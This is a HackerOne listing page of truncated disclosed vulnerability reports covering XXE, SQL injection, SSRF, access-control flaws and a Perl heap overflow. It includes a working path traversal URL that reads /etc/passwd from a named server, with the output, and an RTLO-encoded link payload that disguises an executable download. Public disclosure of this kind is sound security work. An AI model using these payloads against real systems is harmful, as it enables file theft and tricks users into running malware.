HackerOne Reports
Search through disclosed security reports
Summary:
========
Weblate users in the Translate group (or those with the ability to upload translation files) can trigger XML External Entity Execution. This is a well known and high/critical vector of attack that often can completely compromise the security of a web application or in some cases lead to …
Summary
=======
The /api/ does not enforce access control on the translation files, allowing anyone to download full translation files. See the screenshot for an example project being viewed by an anonymous account that is configured to have no permissions.

Description
=======
On my local setup running Weblate 2.15-dev, I …
**Summary:** https://████ is vulnerable to SQL Injection.

**Description:** The `███████` parameter in `https://█████████/██████` does not properly sanitize input, thus allowing an attacker to execute SQL queries on the server!

## Impact
This is a **high impact** vulnerability! I saw a list of tables which I'm guessing contain confidential information such …
# Description
Shopify allows developers to create a special type of application called a "[Sales Channel](https://help.shopify.com/api/sdks/sales-channel-sdk)". Developers are allowed to upload a 16x16 SVG "Navigation Icon" for their app provided the SVG follows the [design guidelines](https://help.shopify.com/api/sdks/sales-channel-sdk/design-guidelines/checklist#navigation-icon), which limit the allowed elements and attributes. For some reason when the SVG contains …
Hi. An attacker can read arbitrary files on the system via the following query:

```
http://doc.rt.informaticacloud.com/infocenter/ActiveVOS/v92/topic/com.activee.bpep.doc/images/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
```

You can see the response here: {F188500}

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
…
```
## Summary
An attacker can embed an `RTLO` character at the following URL https://www.khanacademy.org/computer-programming/link_redirector?url= to trick the user into downloading suspicious files.

## Steps to reproduce
* Visit https://www.khanacademy.org/computer-programming/link_redirector?url=
* Add the following payload to the url parameter `https://example.com/so%E2%80%AEgnp.exe` [https://www.khanacademy.org/computer-programming/link_redirector?url=https://example.com/so%E2%80%AEgnp.exe](https://www.khanacademy.org/computer-programming/link_redirector?url=https://example.com/so%E2%80%AEgnp.exe)
* After visiting the URL you will see the following link appearing on the …
Twitter allows commenting on anyone's tweet. While testing this feature, I observed that one can post a comment on a tweet which will be invisible to the victim to whom the reply was posted but visible to any other Twitter user. This can allow an attacker to abuse a victim on a …
> NOTE! Thanks for submitting a report! Please replace *all* the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!

**Summary:** The OAuth screen …
Private tweets can be used to keep any user's tweets secret from the rest of the Twitter world. Once the user changes his setting from private tweets to public tweets, all his secret tweets become visible. This can become a major issue causing global distributed attacks.

**Steps to Reproduce**
1. Assume the …
Text injection is possible at https://media.hboeck.de if we craft a URL like this: https://media.hboeck.de/?c=http://www.example.com We can see the output in the web app.

## Impact
Defacement of the website by following a crafted link.
## Description
There is a feature on the Phabricator Slowvote application which allows creating polls and asking questions. The poll creator can choose to only allow people who voted to actually see the poll results. However, it seems that by sending an illegal vote a user can still see the …
**Summary:** The Marketo contact form available on the www.hackerone.com website is affected by a cross-site scripting vulnerability, caused by an insecure 'message' event listener installed on the page. Whilst this could allow an attacker to execute JavaScript in the context of the www.hackerone.com application, there were some restrictions which reduced …
Normally, a call to `https://duckduckgo.com/iu` contains a query parameter (`u`) with some path using the domain `yimg.com`. This call will succeed in most cases. {F337121} And if we change that path to something like `https://google.com` it's rejected. {F337118} However, it appears that the check that ensures that `yimg.com` is the …
The `Oauth::Jira::AuthorizationsController#access_token` endpoint is vulnerable to a blind SSRF vulnerability. The vulnerability allows an attacker to make arbitrary HTTP/HTTPS requests inside a GitLab instance's network.

# Proof of concept
To reproduce the vulnerability, follow the steps below.
- spin up a GitLab EE instance with the latest version (11.2.1-ee)
- …
pack() may cause a heap buffer write overflow with a large item count.

* Reported to the [Perl security mailing list](https://rt.perl.org/Public/Bug/Display.html?id=131844) on 5 Aug 2017.
* Confirmed as a security flaw by TonyC on 30 Jan 2018
* CVE-2018-6913 assigned to this flaw on 11 Feb 2018
* [Public security …